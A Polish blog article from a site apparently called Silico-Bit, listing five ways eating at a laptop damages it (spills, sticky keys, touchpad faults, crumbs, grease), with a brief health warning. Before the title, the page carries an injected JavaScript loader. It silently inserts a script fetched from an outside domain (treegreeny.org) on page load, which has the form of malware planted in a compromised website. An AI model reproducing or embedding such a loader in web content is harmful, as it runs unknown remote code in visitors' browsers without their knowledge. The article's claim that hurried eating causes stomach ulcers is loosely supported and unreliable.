;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 5 powodów, dla których nie warto jeść przy laptopie | Silico-Bit
Jedzenie przy komputerze wbrew pozorom nie jest zdrowe ani dla człowieka, ani dla sprzętu. Mimo, że nie odrywamy się od pracy i wydaje nam się, że jesteśmy bardziej produktywni, może się to negatywnie odbić zarówno na zdrowiu, jak i działaniu komputera. Co może zdarzyć się podczas jedzenia przy laptopie i jak należy go chronić, jeśli to jedyne miejsce na posiłek?

  1. Zalanie

Jedzenie przy komputerze płynnych posiłków lub spożywanie przy nim napojów niesie za sobą ryzyko zalania urządzenia. Wylane na klawiaturę napój czy zupa, może ją trwale uszkodzić. O ile w przypadku komputera stacjonarnego koszt wymiany samej klawiatury nie jest wysoki, o tyle w przypadku laptopa, który coraz częściej zastępuje stacjonarny komputer, sprawa może wyglądać o wiele poważniej. To pod klawiaturą laptopa znajdują się wszystkie podzespoły, które determinują prawidłowe działanie urządzenia. Jeśli płynna substancja przedostanie się do nich, może trwale uszkodzić sprzęt i będzie on wymagał kosztownej naprawy. Niestety może się także zdarzyć, że spalone podzespoły uniemożliwią całkowitą naprawę lub będzie ona po prostu nieopłacalna – wtedy będzie trzeba zainwestować w zupełnie nowy sprzęt.

Jedzenie przy laptopie może prowadzić do poważnych uszkodzeń urządzenia

  1. Sklejenie przycisków

Sklejone przyciski na klawiaturze laptopa są czymś, co naprawdę złości użytkowników. Niestety, wystarczy kropla klejącej substancji i przyciski nie działają już tak samo. Zamiast odskakiwać do góry, przyklejają się do podłoża i uniemożliwiają sprawne pisanie na klawiaturze. Największymi przeciwnikami klawiatury w laptopie są: nadzienie z czekolady, cukierki nadziewane i kisiel. Te trzy substancje trwale uszkadzają przyciski i sprawiają, że dochodzi nie tylko do opóźnienia reakcji przycisku, ale także do całkowitego zaklejenia pola i braku działania danego znaku. Stąd wynika, że wystarczy mała przekąska, aby trwale uszkodzić urządzenie.

  1. Uszkodzenie touchpada

Touchpad to ułatwiające korzystanie z laptopa, wbudowane pole, które działa jak mysz komputerowa i steruje kursorem za pomocą dotyku. Jeśli touchpad przestaje działać tak jak wcześniej, może to oznaczać, że został uszkodzony mechanicznie poprzez zalanie czy nagromadzone w środku zabrudzenia. Jeśli płynna substancja dostanie się poprzez szczeliny, czujnik może źle odczytywać ruchy lub całkowicie zatracić działanie kursora. W takim przypadku należy oddać laptop do serwisu, w celu wyczyszczenia sprzętu i doprowadzenia go do stanu pierwotnego.

  1. Okruchy

Okruchy także uprzykrzają życie właścicielom laptopów i komputerów. Nagromadzone pod klawiszami klawiatury okruchy, dokładnie tak jak płynne klejące substancje, mogą uniemożliwić działanie przycisków. Niestety to właśnie okruchy są najczęstszą przyczyną problemów. Przy komputerze jadamy nie tylko posiłki, ale także przekąski. Nic dziwnego, że podczas oglądania filmów czy grania w gry, wiele odłamków wpada pod klawiaturę, blokując dociskanie klawiszy.

Spożywanie posiłku przy laptopie jest także szkodliwe z medycznego punktu widzenia

  1. Tłuste plamy na klawiaturze

Jedząc posiłki przy komputerze czy laptopie zostawiamy także na powierzchni sprzętu mokre lub tłuste plamy. Takie ślady także wpływają bezpośrednio na działanie touchpada czy przycisków na klawiaturze. Brudzimy także ekran, który podczas zamykania laptopa dotyka do tłustych przycisków. Laptop w takim stanie raczej nie stanowi wizytówki, a wilgoć może przedostać się do podzespołów i je uszkodzić.

Niestety jedzenie przy laptopie nie jest zdrowe także dla człowieka. Dotykanie urządzenia, które jest prawdziwym siedliskiem bakterii, a następnie spożywanie posiłku, może narazić nas na poważne dolegliwości. Jedzenie w pośpiechu, nieskupianie się na posiłku oraz brak przerw na spokojny posiłek może prowadzić do wrzodów żołądka i tym podobnych schorzeń. Warto więc odzwyczajać się systematycznie od jedzenia przy sprzęcie elektronicznym, choćby dla własnego bezpieczeństwa. Jeśli jednak biurko w pracy to jedyne miejsce, gdzie można spokojnie spożyć posiłek, należy jak najbardziej odsunąć urządzenie i zabezpieczyć je choćby kartką papieru.